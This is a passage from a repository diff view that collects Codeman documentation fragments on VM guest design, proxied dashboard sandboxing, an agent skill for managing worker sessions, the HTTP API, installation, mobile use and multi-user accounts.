0. **GUI is a first-class mode, and for macOS guests it is the whole point (owner decision, 2026-07-29).** The subsystem serves real desktops, not only headless SSH boxes. macOS guests are GUI-only in practice (nothing renders without an attached view). Linux guests are supported in BOTH modes: GUI when the case wants a desktop, headless-over-SSH when it wants a cheap agent sandbox. The costs of the GUI path are in §8 "Display rendering": VMs as GUI apps in a live session, a host that never locks, guests that auto-login with their first-login wizard pre-suppressed, and the macOS concurrency cap as a real capacity limit.
1. **The macOS-specific liabilities are accepted costs, not reasons to avoid macOS guests**: provisioning is macOS-only and first-boot-only, ASIF space reclamation is broken for macOS guests on the beta (use RAW disks for macOS guests until fixed), and the 2-VM cap applies. Plan around each: RAW-backed macOS disks, provisioning baked into base-image creation, and capacity limits surfaced in the UI.
2. **Base immutability is not just hygiene, it is load-bearing**: DiskImageKit's UUID invalidation plus our sha-stability proof make a read-only shared base per image-generation the core artifact. Bases are built once (seed attached), then only ever opened `.readOnly` under per-case overlays.
3. **Seed ISOs are a base-build-time tool only.** Never attach a seed to a routine case boot (correlated with boot hangs on the beta, and semantically wrong anyway since cloud-init already ran).
4. **Per-case files**: overlay ASIF + EFI variable store live and die together with the case.
5. **Export = ship the layer chain** (base ref + overlay + manifest), not flatten; there is no flatten API. In-guest `dd` to a fresh image is the fallback for a true single-file export.
6. **Health checking must be lease/API based**, not serial/ping based, and Codeman's `codeman-vm status` should read `/var/db/dhcpd_leases` (or use vmnet DHCP reservations for deterministic per-case IPs, a macOS 26 API).
7. **Run `fstrim` periodically in Linux guests** (or mount with discard) so overlays stay sparse.
8. **Entitlements plist stays minimal** (exactly `com.apple.security.virtualization`) to dodge the AMFI/watchdog traps.
9. **Expect beta churn**: pin findings to build numbers (this doc: 26A5388g) and retest each beta; the framework binaries changed every beta so far.
10. **A macOS guest is only "ready" when its desktop is ready**, which is a stricter bar than "the VM booted". Readiness means: VM app running with a live WindowServer connection, guest auto-logged-in (not at a login or lock screen), first-login assistant suppressed, and the guest's screen sharing serving a non-black framebuffer. Health checks should sample the framebuffer for non-black content, because every failure mode in this session (headless run, locked host, dead WindowServer, locked guest, setup wizard) presents as a perfectly healthy-looking process with a black or useless screen.
10b. **Supervision must run as a root LaunchDaemon.** A user LaunchAgent cannot launch a GUI app into the Aqua session; its restarts fail silently (child dies instantly, empty log, supervisor reports success). Root + `launchctl asuser <uid> sudo -u <user> …` works and the launched process persists. This bit us on the first supervisor implementation and is easy to repeat.
11. **Remote-access plumbing belongs in the helper CLI, not in ad-hoc shell**: a `codeman-vm` implementation should own port selection (never 5900), forward lifecycle across guest IP changes (or better, vmnet DHCP reservations for stable per-case IPs), and a documented browser path, because every failure in this session came from hand-rolled plumbing rather than from the Virtualization APIs themselves.
12. **Never let control-plane connectivity depend on a GUI session** on a remote Mac host: prefer a Tailscale system service over the App Store app, and keep a LAN-adjacent peer able to relay as an out-of-band recovery path.
| **Mixed content** | Production serves HTTPS (behind `tailscale serve`). Browsers hard-block `http://` iframes on an HTTPS page, with no override, and none at all on iOS Safari. |
| **Framing refusal** | Grafana, Portainer, Home Assistant and many others send `X-Frame-Options: DENY` or `frame-ancestors 'none'`. |
| **Codeman's CSP** | `default-src 'self'` means `frame-src` falls back to `'self'`, so a cross-origin iframe is blocked before it starts. |
Serving the dashboard **through Codeman's own origin** dissolves all three. So by
default a web tab loads `/webview/<capability>/` on Codeman, and Codeman relays to
the dashboard: stripping the framing refusal, rewriting redirects, cookies and
root-absolute URLs, and relaying WebSockets so live panels actually update.
A useful consequence: the dashboard is fetched **from the Codeman server**, so a
tailnet-only or `localhost`-only dashboard works from any device that can reach
Codeman, including a phone that is not on the tailnet.
`direct` mode (a plain cross-origin iframe) still exists and is cheaper, but it only
works for an HTTPS dashboard that permits framing. The **Test** button probes from
the server and tells you which mode applies. Note what Test actually verifies:
**server-to-upstream reachability, nothing else**. It does not exercise the browser
sandbox, cookies, CORS, CSP, or any reverse proxy sitting in front of Codeman, so a
passing Test does not guarantee the embedded page will render (see the
cookie-authenticated reverse proxy caveat below).
## The sandbox, and when to turn it off
Because a proxied dashboard is served from Codeman's own address, it is
*same-origin with Codeman* as far as the browser is concerned. Left unchecked, its
JavaScript could read the Codeman page and call the API that spawns agents.
So the iframe is sandboxed **without**`allow-same-origin` by default. The page runs
in an opaque origin: it cannot touch Codeman, and it gets no cookies or
`localStorage` of its own.
Unchecking **Open sandboxed** grants `allow-same-origin`. Do that only for a
dashboard you fully trust, and only if you need it, which in practice means a
dashboard with its own login that stores a session in a cookie or `localStorage`.
Even in trusted mode, Codeman never forwards its own credentials upstream: the
`Authorization` header and the `codeman_session` cookie are stripped on the way out,
so `CODEMAN_PASSWORD` cannot leak into a dashboard.
⚠️ **Sandboxed tabs may not work when Codeman itself is behind a
cookie-authenticated reverse proxy** (Cloudflare Access, Authelia, oauth2-proxy and
similar). The sandboxed frame is opaque-origin, so its stylesheet, script, and API
requests do not carry the proxy's authentication cookie; the proxy redirects them to
the login provider, where CORS/CSP kills them, and the embedded app renders
unstyled or broken while the Codeman page around it works fine. Trusted mode
(**Open sandboxed** off) keeps a real origin and the cookie, so it works. The
**Test** button cannot catch this: it checks that the Codeman *server* can reach the
upstream, not that a sandboxed *browser* frame can load assets through the public
authentication layer.
## How the proxy authenticates
A sandboxed iframe is opaque-origin, so every request it makes is cross-site: the
`SameSite=lax` session cookie is not sent, and writes and WebSocket upgrades arrive
with `Origin: null`. Cookie auth cannot work.
Instead, opening a dashboard mints a **capability**: 192 bits of entropy in the URL
path, held in memory only, with a rolling 12-hour TTL, bound to the user who minted
it, and granting exactly one thing, relaying bytes to that one saved URL. Editing or
deleting a dashboard revokes it, and a server restart invalidates every outstanding
capability (tabs re-mint transparently on next click).
- [`docs/architecture-invariants.md`](https://github.com/Ark0N/Codeman/blob/master/docs/architecture-invariants.md) - the mechanisms behind all of this, for contributors.
| "What sessions are running right now?" | Lists them with name, mode, and status. Read-only. |
| "Start a shell worker on the `myapp` case, run the test suite, tell me if it passes." | Spawns, waits on a completion marker, reads the exit code, cleans up. |
| "Spin up 3 workers for lint, typecheck and tests, run them in parallel, report failures." | One session per task, all started first, then gathered as each finishes. |
| "Have a claude worker summarize `src/session.ts`, then close it." | Spawns, runs the readiness ladder, sends and waits, reads the answer, deletes the session. |
| "Watch session w4 and tell me if it gets stuck on a permission prompt." | Blocks on the `blocked` signal and surfaces the question to **you**. |
Sessions the agent creates get deleted when it is done. You can watch the tabs appear and
disappear in the dashboard while it works.
### What it will and will not do
- **It self-gates.** Outside a Codeman session it refuses to act and does not guess an API
URL, so a global install costs an unrelated Claude Code session nothing.
- **Unprompted, it may only** spawn sessions, prompt them, and delete ones **it created in
that conversation, by exact id**, behind a guard that refuses to delete the agent's own
session.
- **It will not** answer another session's permission prompt on your behalf. It surfaces the
question instead.
- **Deleting a case** (which erases a real directory of your code), bulk kills, respawn,
Ralph, cron, orchestrator, and settings writes all require you to ask, naming the target.
Turning the setting back off **does not remove already-injected copies**, because a
create-time sweep would yank the skill out from under other live sessions sharing that
directory. Remove them per case with `codeman skill uninstall --case <name>`.
The skill ships with the verb index always loaded, plus on-demand references for the verbs,
worked multi-worker recipes, endpoint tables, and cross-session messaging.
## The manual path
The same operations as raw HTTP, for a CI bot, a shell script, or an agent without skill
support.
### Detect that you are inside Codeman
These are set in every managed session. Read them rather than hardcoding anything:
| `CODEMAN_MUX=1` | You are in a managed tmux session. Never `tmux kill-session`, `pkill claude`, or `pkill tmux`: you will kill yourself or a sibling. |
| `CODEMAN_API_URL` | Base URL, with the correct scheme. |
| `CODEMAN_SESSION_ID` | Your own session id. Use it to avoid acting on yourself. |
| `CODEMAN_HOOK_SECRET_FILE` | Path to the hook secret. |
### Rules of the road
Read these before writing any code. Each one has cost somebody an afternoon.
1. **Input is single line and must end with `\r`.** Enter fires only when the payload
contains a carriage return. Without it the text sits unsubmitted on the prompt, the
request still succeeds, and a combined wait burns its full timeout on a turn that never
started. Embedded newlines are stripped rather than rejected, so `"echo A\necho B\r"` runs
the joined `echo Aecho B`. One line per call.
2. **Make input idempotent.** Send a stable `clientId` and a monotonic per-session `seq`. The
server deduplicates, so a retry after a dropped connection cannot double-deliver.
3. **Auth.** With `CODEMAN_PASSWORD` set, use HTTP Basic or the session cookie. A missing
`Origin` is allowed, so plain curl works. A `401` replies with the bare string
`Unauthorized`, **not** the JSON envelope, so piping it into `jq` throws a parse error
instead of showing the failure. Check the status before parsing.
4. **Envelope.** Most endpoints return `{ "success": true, "data": ... }`. A few legacy GETs
return bare bodies, so handle both: `body.data ?? body`.
5. **Wait instead of polling, and a timeout is not an error.** The wait endpoints answer
`200` with `wait.timedOut: true`. Loop over short waits rather than one long call, because
tunnels cut idle connections.
6. **Only `claude` sessions emit `stop` and `blocked`.** They come from Claude Code hooks.
Shell and the external CLIs accept only `idle`, `working`, and `exit`; asking for `stop`
explicitly there is a `400`, while omitting `until` is always safe. On a shell session
`idle` fires **once at startup and never again**, so synchronize hook-less sessions with an
output marker instead.
7. **Nothing reports "ready", so wait for it explicitly.** A new session answers
`{"signal":"exit","immediate":true}` until its PID exists, and that means *not started*,
not *crashed*. A Claude worker in a fresh case then sits on the CLI's trust dialog; prompt
it there and the wait resolves on idle in about two seconds looking exactly like a finished
turn, while your text sits stuck in the dialog.
### Recipes
```bash
API="${CODEMAN_API_URL:-http://localhost:3000}"
# Add -u admin:"$CODEMAN_PASSWORD" if a password is set, and -k on an HTTPS install.
| OS | macOS or Linux. Windows works through WSL2. |
| Node.js | 22 or newer. |
| tmux | Required. Sessions live in tmux, which is what makes them survive restarts. |
| An agent CLI | At least one of Claude Code, OpenCode, Codex, Gemini, Antigravity, Pi. Plain shell sessions need none. |
| Network | Binds to `127.0.0.1` by default. Reaching it from another device is a deliberate step: see [Remote Access](Remote-Access). |
Codeman is MIT licensed, self-hosted, and sends no telemetry. Everything runs on your
machine.
## Getting help
- **Questions and setup help**: [Discussions](https://github.com/Ark0N/Codeman/discussions), especially [Q&A](https://github.com/Ark0N/Codeman/discussions/categories/q-a).
- **Bugs**: [Issues](https://github.com/Ark0N/Codeman/issues). Include your OS, install method, browser, and which CLI the session was running.
- **Ideas and roadmap**: [Ideas](https://github.com/Ark0N/Codeman/discussions/categories/ideas).
- **Security**: never a public issue. See [SECURITY.md](https://github.com/Ark0N/Codeman/blob/master/.github/SECURITY.md).
| **macOS or Linux** | Windows works through WSL2. See [Windows](#windows-wsl) below. |
| **Node.js 22+** | The installer offers to install it if missing. |
| **tmux** | Not optional. Sessions live inside tmux, which is what makes them survive a server restart, a dropped connection, or a closed laptop. |
| **An agent CLI** | At least one of [Claude Code](https://docs.anthropic.com/en/docs/claude-code), [OpenCode](https://opencode.ai), [Codex](https://developers.openai.com/codex/cli), [Antigravity](https://antigravity.google), [Gemini CLI](https://github.com/google-gemini/gemini-cli), [Pi](https://pi.dev). Plain shell sessions need none. See [Agent CLIs](Agent-CLIs). |
Codeman itself sends no telemetry and phones no home. The only network traffic is your
browser to your server, and whatever the agent CLI you chose does on its own.
## Route A: the installer (recommended)
```bash
curl -fsSL https://getcodeman.com/install | bash
```
This installs Node.js and tmux if they are missing, clones Codeman into `~/.codeman/app`,
and builds it.
What it asks you:
1. **Permission for every system change.** Package installs and agent CLI downloads are
prompted individually. Nothing is installed silently.
2. **How the dashboard should be reachable.** Three choices:
- **Tailscale** (recommended for phone access): keeps the loopback bind and walks you
through `tailscale serve`, including the tailnet HTTPS toggle, then verifies the result
end to end.
- **Your local network** (`0.0.0.0`): prompts for a password. Skipping the password takes
an explicit confirmation and ends on a loud warning.
- **This machine only** (`127.0.0.1`): the safest option, and the default for a bare
`codeman web` regardless of what you pick here.
Which one is preselected depends on what the installer finds. A fresh install defaults to
the local network, unless Tailscale is already connected, in which case it defaults to
Tailscale. An existing loopback install defaults to keeping loopback, or to Tailscale when
a serve mapping for Codeman is already there. A bare Enter never pulls in new software,
and a non-interactive run always keeps the safe loopback default.
3. **What to do when it finishes.** Run in this terminal, install as a background service
that starts on boot, or do nothing yet.
Re-running the same one-liner **updates an existing install in place**. Local changes in
`~/.codeman/app` are stashed rather than discarded, a running service is restarted and
verified, and your existing network binding is preserved. An interrupted first install
resumes instead of restarting.
Two other entry points exist:
```bash
install.sh update # update only
install.sh uninstall # remove
install.sh tailscale # retrofit Tailscale access onto an existing install
```
**Automation and CI**: with no terminal attached, any step that would change the system
aborts with instructions instead of running silently. Set `CODEMAN_NONINTERACTIVE=1` to
approve those steps. `CODEMAN_TAILSCALE=1` preselects the Tailscale answer, and never
installs Tailscale itself non-interactively.
## Route B: npm
```bash
npm install -g aicodeman
codeman web
```
The npm package is named `aicodeman`; the product is Codeman. Both `codeman` and
`aicodeman` are installed as commands.
The trade-off against Route A: no guided network setup, and the in-app self-updater does
not apply. npm installs report as non-updatable in **App Settings → System → Updates**, and
you update with `npm update -g aicodeman`.
## Route C: git clone
For contributing, or for running unreleased code.
```bash
git clone https://github.com/Ark0N/Codeman.git
cd Codeman
npm install # postinstall builds the vendored xterm addon bundles
npm run dev # dev server on http://localhost:3000
```
For a production run from a clone:
```bash
npm run build
npm run start
```
`npm run dev` runs TypeScript directly through `tsx` with no build step. The frontend is
plain JavaScript served from `src/web/public/` with no bundler, so editing a `.js` or `.css`
file and reloading the page is enough. The one exception is `index.html`, which is read once
at server start, so markup changes need a restart.
See [Contributing](Contributing) for the rest of the development loop.
## Installing an agent CLI
Codeman drives CLIs, it does not bundle them. Install at least one:
| **Claude Code** | `npm i -g @anthropic-ai/claude-code` | The primary target. Some Codeman features are Claude-only: see [Agent CLIs](Agent-CLIs). |
| **OpenCode** | See [opencode.ai](https://opencode.ai) | |
| **Codex** | See [developers.openai.com/codex/cli](https://developers.openai.com/codex/cli) | |
| **Antigravity** | See [antigravity.google](https://antigravity.google) | Google's successor to the consumer Gemini CLI. |
| **Gemini CLI** | See [github.com/google-gemini/gemini-cli](https://github.com/google-gemini/gemini-cli) | Enterprise only since Google's June 2026 consumer cutover. |
| **Pi** | See [pi.dev](https://pi.dev) | No permission prompts and no sandbox by design. Read [Agent CLIs](Agent-CLIs) before using it on a repo you care about. |
Log each CLI in once, by hand, before pointing Codeman at it. Codeman never collects or
stores your CLI credentials.
## Verify the install
```bash
codeman doctor # checks Node, tmux, the agent CLIs, document converters
codeman --version
codeman web # then open http://localhost:3000
```
`codeman doctor --json` gives machine-readable output, and `--category core` narrows it to
the things a session cannot start without.
If the dashboard loads and **+ New Session** opens, you are done. Continue to
Codeman on a phone is not a shrunken desktop UI. It is the surface most of its design
attention has gone into, because checking on an agent from a bus is the thing this software
is for.
<p align="center">
<img src="https://raw.githubusercontent.com/Ark0N/Codeman/master/docs/screenshots/mobile-session-keyboard-20260727.png" alt="Answering an agent prompt on a phone" width="300">
</p>
## Getting there
1. **Set up access.** Tailscale is the recommended route and gives you real HTTPS. See
[Remote Access](Remote-Access).
2. **Log in by QR.** Open the dashboard on your desktop and scan the code. No password
typing. Tokens are single use and rotate every 60 seconds.
3. **Install it to your home screen.** On iOS this is mandatory for push notifications;
Safari does not deliver push to tabs. On Android it makes the app full screen.
HTTPS matters for more than security here: microphone access and push notifications both
| Claude runs in `auto` permission mode | Anthropic's classifier-guarded mode instead of skip-prompts. |
| Raw shell sessions require a grant | A plain shell is unmediated machine access. |
| Skip-permissions requires a grant | Same reasoning. |
| Cron `launchCommand` requires a grant | It is an arbitrary command on a schedule. |
| Pi project trust defaults to off | Trust makes Pi execute repo-local TypeScript. |
These exist because the OS boundary is shared. They narrow what a normal account can do
casually; they do not make the account a sandbox.
## Accounts and sessions
Each user authenticates with their own name and password rather than the shared
`CODEMAN_PASSWORD`. Logins are individually revocable: disable, reset, or delete an account
at any time, and existing browser sessions can be revoked.
## Gotchas
- **Enabling it does not migrate existing cases** into a user space. They stay where they
are, owned by whoever the ownership rules resolve them to.
- **Admins see everything**, including other users' sessions. Choose admins accordingly.
- **The audit log is append-only and local.** Ship it somewhere if you care about it.
- **It is not a substitute for OS accounts.** Restating this because it is the one thing
people get wrong.
## Read next
- [Security](Security) - where this fits in the model, and what it does not cover.
- [Docker Cases](Docker-Cases) - the isolation story that actually isolates.
- [`docs/multi-user-plan.md`](https://github.com/Ark0N/Codeman/blob/master/docs/multi-user-plan.md) - the design.
Some files were not shown because too many files have changed in this diff
Show More
Reference in New Issue
Block a user
Blocking a user prevents them from interacting with repositories, such as opening or commenting on pull requests or issues. Learn more about blocking a user.